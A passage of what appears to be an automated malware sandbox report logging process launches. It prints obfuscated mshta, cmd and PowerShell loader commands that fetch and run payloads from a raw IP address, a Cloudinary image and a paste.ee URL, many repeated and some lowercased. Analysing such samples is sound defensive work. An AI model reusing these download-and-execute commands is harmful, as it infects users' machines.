AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u10solcd\u10solcd.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES367B.tmp" "c:\Users\user\AppData\Local\Temp\u10solcd\CSCB37CF81CE4334084B75C7031C6A4882F.TMP"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeing
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jdrjrjzkicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrklxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfckrfrklosxrjt04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvsbg1ptiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwmjqz0z0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbqwcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagbfd1whlfsfusdwludcagicagicagicagicagicagicagicagicagicagicagicbbynqssw50uhryicagicagicagicagicagicagicagicagicagicagicagihbuqncpoycgicagicagicagicagicagicagicagicagicagicagicaglu5hbwugicagicagicagicagicagicagicagicagicagicagicaginvvuyigicagicagicagicagicagicagicagicagicagicagicaglu5btwvtuefjzsagicagicagicagicagicagicagicagicagicagicagicbjucagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicq0suy2sjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yos8xmtgvznjlzxnpemvkcmvzc2zvcm5hdhvyywxizwf1dhlpbnroaxnjyxnlzm9yew91z29vzc50suyilcikru5wokfquerbvefcznjlzxnpemvkcmvzc2zvcm5hdhvyywxizwf1dhlpbnroaxnjyxnlzm9yew91lnziuyismcwwkttzdefyvc1zbgvfccgzkttpbnzvs0utzxhwckvtu2lvtiagicagicagicagicagicagicagicagicagicagicagicaijgvudjpbufbeqvrbxgzyzwvzaxplzhjlc3nmb3juyxr1cmfsymvhdxr5aw50aglzy2fzzwzvcnlvds52ylmi'+[char]34+'))')))"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jdrjrjzkicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrklxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfckrfrklosxrjt04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvsbg1ptiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwmjqz0z0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbqwcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagbfd1whlfsfusdwludcagicagicagicagicagicagicagicagicagicagicagicbbynqssw50uhryicagicagicagicagicagicagicagicagicagicagicagihbuqncpoycgicagicagicagicagicagicagicagicagicagicagicaglu5hbwugicagicagicagicagicagicagicagicagicagicagicaginvvuyigicagicagicagicagicagicagicagicagicagicagicaglu5btwvtuefjzsagicagicagicagicagicagicagicagicagicagicagicbjucagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicq0suy2sjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yos8xmtgvznjlzxnpemvkcmvzc2zvcm5hdhvyywxizwf1dhlpbnroaxnjyxnlzm9yew91z29vzc50suyilcikru5wokfquerbvefcznjlzxnpemvkcmvzc2zvcm5hdhvyywxizwf1dhlpbnroaxnjyxnlzm9yew91lnziuyismcwwkttzdefyvc1zbgvfccgzkttpbnzvs0utzxhwckvtu2lvtiagicagicagicagicagicagicagicagicagicagicagicaijgvudjpbufbeqvrbxgzyzwvzaxplzhjlc3nmb3juyxr1cmfsymvhdxr5aw50aglzy2fzzwzvcnlvds52ylmi'+[char]34+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $comicsverse = 'jghlbgljb3byb3rlawqgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhp2ywk4nnvol2ltywdll3vwbg9hzc92mtcznda1mdk5ms91bnhhb29pewt4zm13oxbhbjr6ms5qcgcgjzskbwv0yxboexrlid0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddsky2hvdwwgpsakbwv0yxboexrllkrvd25sb2fkrgf0ysgkagvsawnvchjvdgvpzck7jhbvb2tvbya9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrjag91bck7jhjhbmdpbmvzcya9icc8pejbu0u2nf9tvefsvd4+jzskegfudghhbgluzsa9icc8pejbu0u2nf9ftkq+pic7jfbpemfycm8gpsakcg9va29vlkluzgv4t2yojhjhbmdpbmvzcyk7jghhbmdlcia9icrwb29rb28usw5kzxhpzigkegfudghhbgluzsk7jfbpemfycm8glwdlidaglwfuzcakagfuz2vyic1ndcakugl6yxjybzskugl6yxjybyarpsakcmfuz2luzxnzlkxlbmd0adskc3ludgf4aw4gpsakagfuz2vyic0gjfbpemfycm87jgluc2fsdmvhymxlid0gjhbvb2tvby5tdwjzdhjpbmcojfbpemfycm8sicrzew50yxhpbik7jhvuy2x1dhrlcia9ic1qb2luicgkaw5zywx2zwfibguuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojgluc2fsdmvhymxllkxlbmd0acldoyrjyxrhc3ryb3bozsa9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojhvuy2x1dhrlcik7jg5lcghyb2kgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrjyxrhc3ryb3bozsk7jgnvbnzlcmjzid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jgnvbnzlcmjzlkludm9rzsgkbnvsbcwgqcgnmc9mv3pwcs9yl2vllmv0c2fwly86c3b0dggnlcanjghhc3nszwqnlcanjghhc3nszwqnlcanjghhc3nszwqnlcanq2fzug9sjywgjyroyxnzbgvkjywgjyroyxnzbgvkjywnjghhc3nszwqnlcckagfzc2xlzccsjyroyxnzbgvkjywnjghhc3nszwqnlcckagfzc2xlzccsjzenlcckagfzc2xlzccsjycpkts=';$eyeing = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($comicsverse));invoke-expression $eyeing
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jdrjrjzkicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrklxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfckrfrklosxrjt04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvsbg1ptiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwmjqz0z0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbqwcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagbfd1whlfsfusdwludcagicagicagicagicagicagicagicagicagicagicagicbbynqssw50uhryicagicagicagicagicagicagicagicagicagicagicagihbuqncpoycgicagicagicagicagicagicagicagicagicagicagicaglu5hbwugicagicagicagicagicagicagicagicagicagicagicaginvvuyigicagicagicagicagicagicagicagicagicagicagicaglu5btwvtuefjzsagicagicagicagicagicagicagicagicagicagicagicbjucagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicq0suy2sjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yos8xmtgvznjlzxnpemvkcmvzc2zvcm5hdhvyywxizwf1dhlpbnroaxnjyxnlzm9yew91z29vzc50suyilcikru5wokfquerbvefcznjlzxnpemvkcmvzc2zvcm5hdhvyywxizwf1dhlpbnroaxnjyxnlzm9yew91lnziuyismcwwkttzdefyvc1zbgvfccgzkttpbnzvs0utzxhwckvtu2lvtiagicagicagicagicagicagicagicagicagicagicagicaijgvudjpbufbeqvrbxgzyzwvzaxplzhjlc3nmb3juyxr1cmfsymvhdxr5aw50aglzy2fzzwzvcnlvds52ylmi'+[char]34+'))')))"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jdrjrjzkicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrklxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfckrfrklosxrjt04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvsbg1ptiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwmjqz0z0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbqwcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagbfd1whlfsfusdwludcagicagicagicagicagicagicagicagicagicagicagicbbynqssw50uhryicagicagicagicagicagicagicagicagicagicagicagihbuqncpoycgicagicagicagicagicagicagicagicagicagicagicaglu5hbwugicagicagicagicagicagicagicagicagicagicagicaginvvuyigicagicagicagicagicagicagicagicagicagicagicaglu5btwvtuefjzsagicagicagicagicagicagicagicagicagicagicagicbjucagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicq0suy2sjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yos8xmtgvznjlzxnpemvkcmvzc2zvcm5hdhvyywxizwf1dhlpbnroaxnjyxnlzm9yew91z29vzc50suyilcikru5wokfquerbvefcznjlzxnpemvkcmvzc2zvcm5hdhvyywxizwf1dhlpbnroaxnjyxnlzm9yew91lnziuyismcwwkttzdefyvc1zbgvfccgzkttpbnzvs0utzxhwckvtu2lvtiagicagicagicagicagicagicagicagicagicagicagicaijgvudjpbufbeqvrbxgzyzwvzaxplzhjlc3nmb3juyxr1cmfsymvhdxr5aw50aglzy2fzzwzvcnlvds52ylmi'+[char]34+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $comicsverse = 'jghlbgljb3byb3rlawqgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhp2ywk4nnvol2ltywdll3vwbg9hzc92mtcznda1mdk5ms91bnhhb29pewt4zm13oxbhbjr6ms5qcgcgjzskbwv0yxboexrlid0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddsky2hvdwwgpsakbwv0yxboexrllkrvd25sb2fkrgf0ysgkagvsawnvchjvdgvpzck7jhbvb2tvbya9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrjag91bck7jhjhbmdpbmvzcya9icc8pejbu0u2nf9tvefsvd4+jzskegfudghhbgluzsa9icc8pejbu0u2nf9ftkq+pic7jfbpemfycm8gpsakcg9va29vlkluzgv4t2yojhjhbmdpbmvzcyk7jghhbmdlcia9icrwb29rb28usw5kzxhpzigkegfudghhbgluzsk7jfbpemfycm8glwdlidaglwfuzcakagfuz2vyic1ndcakugl6yxjybzskugl6yxjybyarpsakcmfuz2luzxnzlkxlbmd0adskc3ludgf4aw4gpsakagfuz2vyic0gjfbpemfycm87jgluc2fsdmvhymxlid0gjhbvb2tvby5tdwjzdhjpbmcojfbpemfycm8sicrzew50yxhpbik7jhvuy2x1dhrlcia9ic1qb2luicgkaw5zywx2zwfibguuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojgluc2fsdmvhymxllkxlbmd0acldoyrjyxrhc3ryb3bozsa9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojhvuy2x1dhrlcik7jg5lcghyb2kgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrjyxrhc3ryb3bozsk7jgnvbnzlcmjzid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jgnvbnzlcmjzlkludm9rzsgkbnvsbcwgqcgnmc9mv3pwcs9yl2vllmv0c2fwly86c3b0dggnlcanjghhc3nszwqnlcanjghhc3nszwqnlcanjghhc3nszwqnlcanq2fzug9sjywgjyroyxnzbgvkjywgjyroyxnzbgvkjywnjghhc3nszwqnlcckagfzc2xlzccsjyroyxnzbgvkjywnjghhc3nszwqnlcckagfzc2xlzccsjzenlcckagfzc2xlzccsjycpkts=';$eyeing = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($comicsverse));invoke-expression $eyeing
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jdrjrjzkicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrklxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfckrfrklosxrjt04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvsbg1ptiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwmjqz0z0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbqwcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagbfd1whlfsfusdwludcagicagicagicagicagicagicagicagicagicagicagicbbynqssw50uhryicagicagicagicagicagicagicagicagicagicagicagihbuqncpoycgicagicagicagicagicagicagicagicagicagicagicaglu5hbwugicagicagicagicagicagicagicagicagicagicagicaginvvuyigicagicagicagicagicagicagicagicagicagicagicaglu5btwvtuefjzsagicagicagicagicagicagicagicagicagicagicagicbjucagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicq0suy2sjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yos8xmtgvznjlzxnpemvkcmvzc2zvcm5hdhvyywxizwf1dhlpbnroaxnjyxnlzm9yew91z29vzc50suyilcikru5wokfquerbvefcznjlzxnpemvkcmvzc2zvcm5hdhvyywxizwf1dhlpbnroaxnjyxnlzm9yew91lnziuyismcwwkttzdefyvc1zbgvfccgzkttpbnzvs0utzxhwckvtu2lvtiagicagicagicagicagicagicagicagicagicagicagicaijgvudjpbufbeqvrbxgzyzwvzaxplzhjlc3nmb3juyxr1cmfsymvhdxr5aw50aglzy2fzzwzvcnlvds52ylmi'+[char]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jdrjrjzkicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrklxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfckrfrklosxrjt04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvsbg1ptiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwmjqz0z0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbqwcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagbfd1whlfsfusdwludcagicagicagicagicagicagicagicagicagicagicagicbbynqssw50uhryicagicagicagicagicagicagicagicagicagicagicagihbuqncpoycgicagicagicagicagicagicagicagicagicagicagicaglu5hbwugicagicagicagicagicagicagicagicagicagicagicaginvvuyigicagicagicagicagicagicagicagicagicagicagicaglu5btwvtuefjzsagicagicagicagicagicagicagicagicagicagicagicbjucagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicq0suy2sjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yos8xmtgvznjlzxnpemvkcmvzc2zvcm5hdhvyywxizwf1dhlpbnroaxnjyxnlzm9yew91z29vzc50suyilcikru5wokfquerbvefcznjlzxnpemvkcmvzc2zvcm5hdhvyywxizwf1dhlpbnroaxnjyxnlzm9yew91lnziuyismcwwkttzdefyvc1zbgvfccgzkttpbnzvs0utzxhwckvtu2lvtiagicagicagicagicagicagicagicagicagicagicagicaijgvudjpbufbeqvrbxgzyzwvzaxplzhjlc3nmb3juyxr1cmfsymvhdxr5aw50aglzy2fzzwzvcnlvds52ylmi'+[char]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $comicsverse = 'jghlbgljb3byb3rlawqgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhp2ywk4nnvol2ltywdll3vwbg9hzc92mtcznda1mdk5ms91bnhhb29pewt4zm13oxbhbjr6ms5qcgcgjzskbwv0yxboexrlid0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddsky2hvdwwgpsakbwv0yxboexrllkrvd25sb2fkrgf0ysgkagvsawnvchjvdgvpzck7jhbvb2tvbya9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrjag91bck7jhjhbmdpbmvzcya9icc8pejbu0u2nf9tvefsvd4+jzskegfudghhbgluzsa9icc8pejbu0u2nf9ftkq+pic7jfbpemfycm8gpsakcg9va29vlkluzgv4t2yojhjhbmdpbmvzcyk7jghhbmdlcia9icrwb29rb28usw5kzxhpzigkegfudghhbgluzsk7jfbpemfycm8glwdlidaglwfuzcakagfuz2vyic1ndcakugl6yxjybzskugl6yxjybyarpsakcmfuz2luzxnzlkxlbmd0adskc3ludgf4aw4gpsakagfuz2vyic0gjfbpemfycm87jgluc2fsdmvhymxlid0gjhbvb2tvby5tdwjzdhjpbmcojfbpemfycm8sicrzew50yxhpbik7jhvuy2x1dhrlcia9ic1qb2luicgkaw5zywx2zwfibguuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojgluc2fsdmvhymxllkxlbmd0acldoyrjyxrhc3ryb3bozsa9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojhvuy2x1dhrlcik7jg5lcghyb2kgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrjyxrhc3ryb3bozsk7jgnvbnzlcmjzid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jgnvbnzlcmjzlkludm9rzsgkbnvsbcwgqcgnmc9mv3pwcs9yl2vllmv0c2fwly86c3b0dggnlcanjghhc3nszwqnlcanjghhc3nszwqnlcanjghhc3nszwqnlcanq2fzug9sjywgjyroyxnzbgvkjywgjyroyxnzbgvkjywnjghhc3nszwqnlcckagfzc2xlzccsjyroyxnzbgvkjywnjghhc3nszwqnlcckagfzc2xlzccsjzenlcckagfzc2xlzccsjycpkts=';$eyeing = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($comicsverse));invoke-expression $eyeingJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jdrjrjzkicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrklxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfckrfrklosxrjt04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvsbg1ptiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwmjqz0z0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbqwcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagbfd1whlfsfusdwludcagicagicagicagicagicagicagicagicagicagicagicbbynqssw50uhryicagicagicagicagicagicagicagicagicagicagicagihbuqncpoycgicagicagicagicagicagicagicagicagicagicagicaglu5hbwugicagicagicagicagicagicagicagicagicagicagicaginvvuyigicagicagicagicagicagicagicagicagicagicagicaglu5btwvtuefjzsagicagicagicagicagicagicagicagicagicagicagicbjucagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicq0suy2sjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yos8xmtgvznjlzxnpemvkcmvzc2zvcm5hdhvyywxizwf1dhlpbnroaxnjyxnlzm9yew91z29vzc50suyilcikru5wokfquerbvefcznjlzxnpemvkcmvzc2zvcm5hdhvyywxizwf1dhlpbnroaxnjyxnlzm9yew91lnziuyismcwwkttzdefyvc1zbgvfccgzkttpbnzvs0utzxhwckvtu2lvtiagicagicagicagicagicagicagicagicagicagicagicaijgvudjpbufbeqvrbxgzyzwvzaxplzhjlc3nmb3juyxr1cmfsymvhdxr5aw50aglzy2fzzwzvcnlvds52ylmi'+[char]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jdrjrjzkicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrklxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfckrfrklosxrjt04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvsbg1ptiisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwmjqz0z0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbqwcxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagbfd1whlfsfusdwludcagicagicagicagicagicagicagicagicagicagicagicbbynqssw50uhryicagicagicagicagicagicagicagicagicagicagicagihbuqncpoycgicagicagicagicagicagicagicagicagicagicagicaglu5hbwugicagicagicagicagicagicagicagicagicagicagicaginvvuyigicagicagicagicagicagicagicagicagicagicagicaglu5btwvtuefjzsagicagicagicagicagicagicagicagicagica